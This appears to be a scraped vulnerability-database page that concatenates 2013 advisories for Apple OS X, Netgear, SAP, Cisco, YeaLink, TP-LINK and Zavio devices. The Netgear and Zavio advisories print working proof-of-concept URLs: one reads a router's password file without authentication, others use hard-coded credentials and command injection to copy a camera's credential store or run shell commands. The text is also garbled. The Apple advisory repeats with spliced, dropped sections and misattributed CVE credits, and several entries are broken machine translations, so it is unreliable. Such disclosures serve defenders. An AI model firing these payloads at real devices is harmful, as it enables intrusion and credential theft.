VARIoT IoT vulnerabilities database

SMB in Apple Mac OS X before 10.8.4, when file sharing is enabled, allows remote authenticated users to create or modify files outside of a shared directory via unspecified vectors. Note: This issue was previously covered in BID 60329 (Apple Mac OS X Security Update 2013-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. Apple Mac OS X is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, gain unauthorized access, obtain sensitive information, bypass security restrictions, and perform other attacks. These issues affect OS X prior to 10.8.4. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002 OS X Mountain Lion v10.8.4 and Security Update 2013-002 is now available and addresses the following: CFNetwork Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: An attacker with access to a user's session may be able to log into previously accessed sites, even if Private Browsing was used Description: Permanent cookies were saved after quitting Safari, even when Private Browsing was enabled. This issue was addressed by improved handling of cookies. CVE-ID CVE-2013-0982 : Alexander Traud of www.traud.de CoreAnimation Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: Visiting a maliciously crafted site may lead to an unexpected application termination or arbitrary code execution Description: An unbounded stack allocation issue existed in the handling of text glyphs. This could be triggered by maliciously crafted URLs in Safari. The issue was addressed through improved bounds checking. CVE-ID CVE-2013-0983 : David Fifield of Stanford University, Ben Syverson CoreMedia Playback Available for: OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of text tracks. This issue was addressed by additional validation of text tracks. CVE-ID CVE-2013-1024 : Richard Kuo and Billy Suguitan of Triemt Corporation CUPS Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: A local user in the lpadmin group may be able to read or write arbitrary files with system privileges Description: A privilege escalation issue existed in the handling of CUPS configuration via the CUPS web interface. A local user in the lpadmin group may be able to read or write arbitrary files with system privileges. This issue was addressed by moving certain configuration directives to cups-files.conf, which can not be modified from the CUPS web interface. CVE-ID CVE-2012-5519 Directory Service Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: A remote attacker may execute arbitrary code with system privileges on systems with Directory Service enabled Description: An issue existed in the directory server's handling of messages from the network. By sending a maliciously crafted message, a remote attacker could cause the directory server to terminate or execute arbitrary code with system privileges. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0984 : Nicolas Economou of Core Security Disk Management Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: A local user may disable FileVault Description: A local user who is not an administrator may disable FileVault using the command-line. This issue was addressed by adding additional authentication. This issue was addressed by disabling compression in OpenSSL. Further information is available via the OpenSSL website at http://www.openssl.org/news/ CVE-ID CVE-2011-1945 CVE-2011-3207 CVE-2011-3210 CVE-2011-4108 CVE-2011-4109 CVE-2011-4576 CVE-2011-4577 CVE-2011-4619 CVE-2012-0050 CVE-2012-2110 CVE-2012-2131 CVE-2012-2333 QuickDraw Manager Available for: OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.2 Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of PICT images. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0975 : Tobias Klein working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of 'enof' atoms. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0986 : Tom Gallagher (Microsoft) & Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted QTIF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of QTIF files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0987 : roob working with iDefense VCP QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted FPX file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of FPX files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0988 : G. Geshev working with HP's Zero Day Initiative QuickTime Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: Playing a maliciously crafted MP3 file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of MP3 files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0989 : G. Geshev working with HP's Zero Day Initiative Ruby Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: Multiple vulnerabilities in Ruby on Rails Description: Multiple vulnerabilities existed in Ruby on Rails, the most serious of which may lead to arbitrary code execution on systems running Ruby on Rails applications. These issues were addressed by updating Ruby on Rails to version 2.3.18. Users can update affected gems on such systems by using the /usr/bin/gem utility. This issue was addressed through improved access control. CVE-ID CVE-2013-0990 : Ward van Wanrooij Note: Starting with OS X 10.8.4, Java Web Start (i.e. JNLP) applications downloaded from the Internet need to be signed with a Developer ID certificate. Gatekeeper will check downloaded Java Web Start applications for a signature and block such applications from launching if they are not properly signed. Note: OS X Mountain Lion v10.8.4 includes the content of Safari 6.0.5. For further details see "About the security content of Safari 6.0.5" at http://http//support.apple.com/kb/HT5785 OS X Mountain Lion v10.8.4 and Security Update 2013-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either OS X Mountain Lion v10.8.4, or Security Update 2013-002. For OS X Mountain Lion v10.8.3 The download file is named: OSXUpd10.8.4.dmg Its SHA-1 digest is: 9cf99aa1293cefdac0fb9a24ea133c80f8237b5e For OS X Mountain Lion v10.8 and v10.8.2 The download file is named: OSXUpdCombo10.8.4.dmg Its SHA-1 digest is: 3c95d0c8d0c7f43339a5f4e137e386dd5fe409c3 For OS X Lion v10.7.5 The download file is named: SecUpd2013-002.dmg Its SHA-1 digest is: cfc3bd0941d7c5838aee9e92ee087d78abff3ce7 For OS X Lion Server v10.7.5 The download file is named: SecUpdSrvr2013-002.dmg Its SHA-1 digest is: 34dff575a145e13404e7a2ee8a390d3e7c56fb5e For Mac OS X v10.6.8 The download file is named: SecUpd2013-002.dmg Its SHA-1 digest is: 5da54b38ffb8c147925c3018a8f5bf30ad4ac5b1 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2013-002.dmg Its SHA-1 digest is: b20271f019930fe894c2247a6d5e05f00568b583 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJRrjkiAAoJEPefwLHPlZEwW+AP/0x/cHS3VPY0/a98Xpmdfkdb eo9Ns5FKw6mIkUftrN6qwNAgFXWqQXNIbJ3q8ZnoxcFPakhYyPSp4XowpR79l7kG B2ZrdTx9aIn2bfHZ+h4cE8XnVL8qUDz2RxFopOGbb+wpJxl8/fehDmWokC5wCeF5 N7mnwW2s37QL73BmAMRdi6CYcJCKwhZWGFWmqiNvpFlUP+kcjU/UM1MAzOu0xsiA PD6NrWeUOWfFrcQgx/pspWGvrFyV4FLu+0wQBl9f/DiQNrwVXIr85rHtah+b1NCU pteSxQwb4kRojXdPm4+I3LKoghzGR8xD6+Xl6KdYgReSW89Di4bKM3WpbRLqhRuq 8kv38Gk3/vZDfAnuNQX09dE6EgJ0DVu86SoRQZ1iYRQoLrizVsOvyVQUojZhT47t 6l44L/5cNJd7EcaC8hdmr44cCZdMPDEqoKzn2BavH62WYXbZMPlHBDo/H2ujUUec i7XU7LA1Upw57X4wmIUU4QrlBhNBh39yRKh3katAklayFBjOMEyyL57gURvd6O77 gFOQpUQ6kgqwgQCrtNT6R96igfyu7cVxYW7XchZDHgA3n/YWOAVvXkVeeQ5OUGzC O0UYLMBpPka31yfWP23QaXpV+LW462raI6LnMvRP1245RhokTTThZw6/9xochK2V +VoeoamqaQqZGyOiObbU =vG2v -----END PGP SIGNATURE-----

Buffer overflow in QuickDraw Manager in Apple Mac OS X before 10.8.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the way QuickTime handles the LongComment PICT opcode. It converts an unsigned 16 bit value into a signed 32 bit value after it performs some mathematical operations on it. This value is later used as a size parameter for a memory copy function that copies from the file onto the heap. An attacker can leverage the situation to achieve remote code execution under the context of the user currently logged in. Apple Mac OS X is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, gain unauthorized access, obtain sensitive information, bypass security restrictions, and perform other attacks. These issues affect OS X prior to 10.8.4. Note: This issue was previously covered in BID 60329 (Apple Mac OS X Security Update 2013-002 Multiple Security Vulnerabilities), but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002 OS X Mountain Lion v10.8.4 and Security Update 2013-002 is now available and addresses the following: CFNetwork Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: An attacker with access to a user's session may be able to log into previously accessed sites, even if Private Browsing was used Description: Permanent cookies were saved after quitting Safari, even when Private Browsing was enabled. This issue was addressed by improved handling of cookies. CVE-ID CVE-2013-0982 : Alexander Traud of www.traud.de CoreAnimation Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: Visiting a maliciously crafted site may lead to an unexpected application termination or arbitrary code execution Description: An unbounded stack allocation issue existed in the handling of text glyphs. This could be triggered by maliciously crafted URLs in Safari. The issue was addressed through improved bounds checking. CVE-ID CVE-2013-0983 : David Fifield of Stanford University, Ben Syverson CoreMedia Playback Available for: OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of text tracks. This issue was addressed by additional validation of text tracks. CVE-ID CVE-2013-1024 : Richard Kuo and Billy Suguitan of Triemt Corporation CUPS Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: A local user in the lpadmin group may be able to read or write arbitrary files with system privileges Description: A privilege escalation issue existed in the handling of CUPS configuration via the CUPS web interface. A local user in the lpadmin group may be able to read or write arbitrary files with system privileges. This issue was addressed by moving certain configuration directives to cups-files.conf, which can not be modified from the CUPS web interface. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0984 : Nicolas Economou of Core Security Disk Management Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: A local user may disable FileVault Description: A local user who is not an administrator may disable FileVault using the command-line. This issue was addressed by adding additional authentication. This issue was addressed by disabling compression in OpenSSL. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0975 : Tobias Klein working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of 'enof' atoms. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0986 : Tom Gallagher (Microsoft) & Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted QTIF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of QTIF files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0987 : roob working with iDefense VCP QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: Viewing a maliciously crafted FPX file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of FPX files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0988 : G. Geshev working with HP's Zero Day Initiative QuickTime Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: Playing a maliciously crafted MP3 file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of MP3 files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-0989 : G. Geshev working with HP's Zero Day Initiative Ruby Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: Multiple vulnerabilities in Ruby on Rails Description: Multiple vulnerabilities existed in Ruby on Rails, the most serious of which may lead to arbitrary code execution on systems running Ruby on Rails applications. These issues were addressed by updating Ruby on Rails to version 2.3.18. Users can update affected gems on such systems by using the /usr/bin/gem utility. CVE-ID CVE-2013-0155 CVE-2013-0276 CVE-2013-0277 CVE-2013-0333 CVE-2013-1854 CVE-2013-1855 CVE-2013-1856 CVE-2013-1857 SMB Available for: OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5, OS X Mountain Lion v10.8 to v10.8.3 Impact: An authenticated user may be able to write files outside the shared directory Description: If SMB file sharing is enabled, an authenticated user may be able to write files outside the shared directory. This issue was addressed through improved access control. CVE-ID CVE-2013-0990 : Ward van Wanrooij Note: Starting with OS X 10.8.4, Java Web Start (i.e. JNLP) applications downloaded from the Internet need to be signed with a Developer ID certificate. Gatekeeper will check downloaded Java Web Start applications for a signature and block such applications from launching if they are not properly signed. Note: OS X Mountain Lion v10.8.4 includes the content of Safari 6.0.5. For further details see "About the security content of Safari 6.0.5" at http://http//support.apple.com/kb/HT5785 OS X Mountain Lion v10.8.4 and Security Update 2013-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either OS X Mountain Lion v10.8.4, or Security Update 2013-002. For OS X Mountain Lion v10.8.3 The download file is named: OSXUpd10.8.4.dmg Its SHA-1 digest is: 9cf99aa1293cefdac0fb9a24ea133c80f8237b5e For OS X Mountain Lion v10.8 and v10.8.2 The download file is named: OSXUpdCombo10.8.4.dmg Its SHA-1 digest is: 3c95d0c8d0c7f43339a5f4e137e386dd5fe409c3 For OS X Lion v10.7.5 The download file is named: SecUpd2013-002.dmg Its SHA-1 digest is: cfc3bd0941d7c5838aee9e92ee087d78abff3ce7 For OS X Lion Server v10.7.5 The download file is named: SecUpdSrvr2013-002.dmg Its SHA-1 digest is: 34dff575a145e13404e7a2ee8a390d3e7c56fb5e For Mac OS X v10.6.8 The download file is named: SecUpd2013-002.dmg Its SHA-1 digest is: 5da54b38ffb8c147925c3018a8f5bf30ad4ac5b1 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2013-002.dmg Its SHA-1 digest is: b20271f019930fe894c2247a6d5e05f00568b583 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJRrjkiAAoJEPefwLHPlZEwW+AP/0x/cHS3VPY0/a98Xpmdfkdb eo9Ns5FKw6mIkUftrN6qwNAgFXWqQXNIbJ3q8ZnoxcFPakhYyPSp4XowpR79l7kG B2ZrdTx9aIn2bfHZ+h4cE8XnVL8qUDz2RxFopOGbb+wpJxl8/fehDmWokC5wCeF5 N7mnwW2s37QL73BmAMRdi6CYcJCKwhZWGFWmqiNvpFlUP+kcjU/UM1MAzOu0xsiA PD6NrWeUOWfFrcQgx/pspWGvrFyV4FLu+0wQBl9f/DiQNrwVXIr85rHtah+b1NCU pteSxQwb4kRojXdPm4+I3LKoghzGR8xD6+Xl6KdYgReSW89Di4bKM3WpbRLqhRuq 8kv38Gk3/vZDfAnuNQX09dE6EgJ0DVu86SoRQZ1iYRQoLrizVsOvyVQUojZhT47t 6l44L/5cNJd7EcaC8hdmr44cCZdMPDEqoKzn2BavH62WYXbZMPlHBDo/H2ujUUec i7XU7LA1Upw57X4wmIUU4QrlBhNBh39yRKh3katAklayFBjOMEyyL57gURvd6O77 gFOQpUQ6kgqwgQCrtNT6R96igfyu7cVxYW7XchZDHgA3n/YWOAVvXkVeeQ5OUGzC O0UYLMBpPka31yfWP23QaXpV+LW462raI6LnMvRP1245RhokTTThZw6/9xochK2V +VoeoamqaQqZGyOiObbU =vG2v -----END PGP SIGNATURE-----

NetGear WPN824v3 is a wireless router product from NetGear. An information disclosure vulnerability exists in NetGear WPN824v3. Attackers can use this vulnerability to download configuration files and leak sensitive information. The acquisition of information can help further attacks

NetGear DGN1000B and DGN2200 are both router products of NetGear. A remote authentication bypass vulnerability exists in Netgear DGN1000 and DGN2200 devices. A remote attacker could use this vulnerability to bypass the authentication mechanism with elevated privileges to execute arbitrary commands in the context of the affected device. Vulnerabilities exist in the following versions: NetGear DGN1000 runs firmware versions prior to 1.1.00.48, and Netgear DGN2200 v1. Unauthenticated command execution on Netgear DGN devices ======================================================== [ADVISORY INFORMATION] Title: Unauthenticated command execution on Netgear DGN devices Discovery date: 01/05/2013 Release date: 31/05/2013 Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari) [VULNERABILITY INFORMATION] Class: Authentication bypass, command execution [AFFECTED PRODUCTS] This security vulnerability affects the following products and firmware versions: * Netgear DGN1000, firmware version < 1.1.00.48 * Netgear DGN2200 v1 Other products and firmware versions are probably also vulnerable, but they were not checked. Briefly, the embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers: http://<target-ip-address>/setup.cgi?currentsetting.htm=1 Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL: http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1 Basically this URL leverages the "syscmd" function of the "setup.cgi" script to execute arbitrary commands. In the example above the command being executed is "cat /www/.htpasswd", and the output is displayed in the resulting web page. Slightly variations of this URL can be used to execute arbitrary commands. According to Netgear, DGN2200 v1 is not supported anymore, while v3 and v4 should not be affected by this issue; these versions were not tested by the author. [DISCLAIMER] The author is not responsible for the misuse of the information provided in this security advisory. The advisory is a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice

SAP NetWeaver Gateway allows developers to openly access SAP software in any environment or any terminal for solution development. Because SAP NetWeaver Gateway does not properly limit arbitrary RFC requests, remote attackers are allowed to exploit vulnerabilities to enumerate legitimate SAP client numbers, which range from 000 to 999 and can be enumerated through brute force attacks

The PlayStation 3 is a home game console developed by Sony Computer Entertainment. A security vulnerability exists in PlayStation3 that allows a local attacker to exploit a vulnerability to build a specially crafted SFO file and execute any system commands while saving.

SAP NetWeaver Gateway allows developers to openly access SAP software in any environment or any terminal for solution development. The locking mechanism used by SAP NetWeaver Gateway to protect against brute force attacks is vulnerable. Because the default account lock threshold reset is predictable at 00:01, the remote attacker is allowed to perform brute force attacks between the end of work and midnight, so that the attack will not be attacked. Discover it right away

SAP NetWeaver Gateway allows developers to openly access SAP software in any environment or any terminal for solution development. The RFC_ABAP_INSTALL_AND_RUN RFC provided by SAP NetWeaver Gateway has a security vulnerability. This RFC is used to execute the ABAP source line code, allowing authenticated remote attackers to execute arbitrary commands using the RFC

Cisco TelePresence System Software does not properly handle inactive t-shell sessions, which allows remote authenticated users to cause a denial of service (memory consumption and service outage) by establishing multiple SSH connections, aka Bug ID CSCug77610. Cisco TelePresence System is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCug77610. Cisco TelePresence is a set of video conferencing solutions called "TelePresence" system of Cisco (Cisco). The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect

The encryption functionality in Cisco NX-OS on the Nexus 1000V does not properly handle Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication, which allows remote attackers to intercept or modify network traffic by leveraging certain Layer 2 or Layer 3 access, aka Bug ID CSCud14691. Vendors have confirmed this vulnerability Bug ID CSCud14691 It is released as.Network traffic may be intercepted or altered by third parties using access rights to Layer 2 or Layer 3. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Successful exploits will allow attackers to perform unauthorized actions and obtain sensitive information that may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14691

Array index error in the Virtual Ethernet Module (VEM) kernel driver for VMware ESXi in Cisco NX-OS on the Nexus 1000V, when STUN debugging is enabled, allows remote attackers to cause a denial of service (ESXi crash and purple screen of death) by sending crafted STUN packets to a VEM, aka Bug ID CSCud14825. (ESXi Crash and purple screen (purple screen of death)) There are vulnerabilities that are put into a state. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Sending a specially crafted STUN message to the VEM crashes the ESXi Hypervisor. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCud14825

Cisco NX-OS on the Nexus 1000V does not properly handle authentication for Virtual Ethernet Module (VEM) to Virtual Supervisor Module (VSM) communication, which allows remote attackers to obtain VEM access via (1) spoofed STUN packets or (2) a crafted VMware ESXi instance, aka Bug ID CSCud14832. Vendors have confirmed this vulnerability Bug ID CSCud14832 It is released as.By a third party (1) Camouflaged STUN Packet, or (2) Cleverly crafted VMware ESXi Through the instance VEM May be accessed. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Remote attackers can exploit this issue to bypass authentication mechanism and gain unauthorized access to an affected device. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14832. http://drupal.org/node/207891

The SSL functionality in Cisco NX-OS on the Nexus 1000V does not properly verify X.509 certificates, which allows man-in-the-middle attackers to spoof servers, and intercept or modify Virtual Supervisor Module (VSM) to VMware vCenter communication, via a crafted certificate, aka Bug ID CSCud14837. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. An attacker can exploit this issue to perform man-in-the-middle attacks and perform certain unauthorized actions, which will aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14837. Cisco NX-OS is the American Cisco ( Cisco ) The company's set of operating systems for data centers

Cisco NX-OS on the Nexus 1000V does not assign the proper priority to heartbeat messages from a Virtual Ethernet Module (VEM) to a Virtual Supervisor Module (VSM), which allows remote attackers to cause a denial of service (false VEM unavailability report) via a flood of UDP packets, aka Bug ID CSCud14840. Vendors have confirmed this vulnerability Bug ID CSCud14840 It is released as.A large amount by a third party UDP Service disruption via packets (VEM False reports of non-operational status ) There is a possibility of being put into a state. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The delivery could not be successful, causing the VSM to report that the affected VEM is unavailable and causing a denial of service attack. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCud14840

The YeaLink IP Phone SIP-T20P/SIP-T26P phone device with firmware version <=9.70.0.100 has a security vulnerability that allows an attacker to use the first available SIP account, call without user confirmation, and the caller can also pass the microphone. monitor. YeaLink IP Phone SIP-T20P and SIP-T26P are both enterprise-grade IP phones from YeaLink of China. SIP-T20P is characterized by easy installation and use, convenient management, and improved office efficiency. It is mainly used for SMEs, call centers, governments and industry users. The feature of SIP-T26P is that it supports VLAN and OPen VPN functions, which is suitable for professional users such as supervisors, front desks, dispatchers, and agents. A security bypass vulnerability exists in YeaLink IP Phone SIP-T20P and SIP-T26P. An attacker could use this vulnerability to bypass specific security restrictions and perform unauthorized operations

TP-LINK TL-WR842ND is a wireless router product of China TP-LINK company. A directory traversal vulnerability exists in TP-LINK TL-WR842ND. A remote attacker could use this vulnerability to gain sensitive information that can help launch further attacks. TP-LINK TL-WR842ND There are vulnerabilities in version 3.12.22 Build 120424 Rel.39632n running firmware, other versions may also be affected. TP-LINK TL-WR842ND is prone to a directory-traversal vulnerability

A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 in the General.Time.NTP.Server parameter to the sub_C8C8 function of the binary /opt/cgi/view/param, which could let a remove malicious user execute arbitrary code. Zavio IP The camera has OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Zavio IP Cameras are prone to a command-injection vulnerability. Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable. *Advisory Information* Title: Zavio IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0302 Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: Zavio Release mode: User release 2. *Vulnerability Information* Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570 3. *Vulnerability Description* Multiple vulnerabilities have been found in Zavio IP cameras based on firmware v1.6.03 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials. 2. This flaw can also be used to obtain all credentials of registered users. 3. [CVE-2013-2569] to access the camera video stream. 4. 4. *Vulnerable Packages* . 5. *Non-Vulnerable Packages* . Vendor did not provide details. Contact Zavio for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to Internet unless absolutely necessary. Enable RTSP authentication. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'. Check the parameter 'General.Time.NTP.Server' in requests to '/opt/cgi/view/param'. 7. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567] Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 'wireless_mft.cgi' The last file contains the OS command injection showed in the following section. 8.2. *OS Command Injection* [CVE-2013-2568] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569] The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting: /----- rtsp://192.168.1.100/video.h264 -----/ 8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570] The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept can be used to obtain the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey': /----- http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off -----/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. 2013-05-09: Core asks for a reply. 2013-05-14: Core asks for a reply. 